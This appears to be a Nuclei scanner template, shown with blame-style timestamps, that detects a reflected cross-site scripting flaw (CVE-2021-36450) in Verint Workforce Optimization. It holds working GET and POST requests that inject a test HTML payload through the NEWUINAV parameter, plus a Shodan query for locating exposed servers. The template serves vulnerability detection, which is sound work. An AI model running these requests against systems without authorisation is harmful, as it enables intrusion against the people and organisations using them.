2022-07-14 02:37:09 +00:00
id : CVE-2021-36450
info :
2022-08-29 13:55:23 +00:00
name : Verint Workforce Optimization 15.2.8.10048 - Cross-Site Scripting
2022-07-14 02:37:09 +00:00
author : atomiczsec
severity : medium
2022-08-29 13:55:23 +00:00
description : Verint Workforce Optimization 15.2.8.10048 contains a cross-site scripting vulnerability via the control/my_notifications NEWUINAV parameter.
2022-07-14 02:37:09 +00:00
reference :
- https://medium.com/@1nf0sk/cve-2021-36450-cross-site-scripting-xss-6f5d8d7db740
- https://sushantvkamble.blogspot.com/2021/11/cross-site-scripting-xss.html
2022-07-14 08:45:52 +00:00
- http://verint.com
2022-08-29 13:55:23 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-36450
2022-07-14 02:37:09 +00:00
classification :
2022-07-14 08:45:52 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
2022-07-14 02:37:09 +00:00
cve-id : CVE-2021-36450
cwe-id : CWE-79
2022-07-14 08:29:41 +00:00
metadata :
shodan-query : title:"Verint Sign-in"
2022-07-14 08:45:52 +00:00
verified : "true"
2022-07-14 07:57:13 +00:00
tags : cve,cve2021,xss,verint
2022-07-14 02:37:09 +00:00
requests :
- raw :
2022-07-14 07:57:13 +00:00
- |
GET /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3C%2Fh1%3E26 HTTP/1.1
2022-07-14 02:37:09 +00:00
Host : {{Hostname}}
2022-07-14 07:57:13 +00:00
- |
POST /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3Ch1%3E%26 HTTP/1.1
Host : {{Hostname}}
2022-07-14 02:37:09 +00:00
Content-Type : application/x-www-form-urlencoded
2022-07-14 07:57:13 +00:00
browserCheckEnabled=true&username=admin&language=en_US&defaultHttpPort=80&screenHeight=1080&screenWidth=1920&pageModelType=0&pageDirty=false&pageAction=Login&csrfp_login={{csrfp_login}}
redirects : true
max-redirects : 2
cookie-reuse : true
extractors :
- type : regex
2022-07-14 08:29:41 +00:00
part : header
internal : true
2022-07-14 07:57:13 +00:00
name : csrfp_login
group : 1
regex :
- 'csrfp_login=([a-zA-Z0-9]+);'
2022-07-14 08:29:41 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
- '"><h1>Test</h1>26" class="loginUserNameText'
- type : word
part : header
words :
- text/html
- type : status
status :
- 200
2022-08-29 13:55:23 +00:00
# Enhanced by mp on 2022/08/28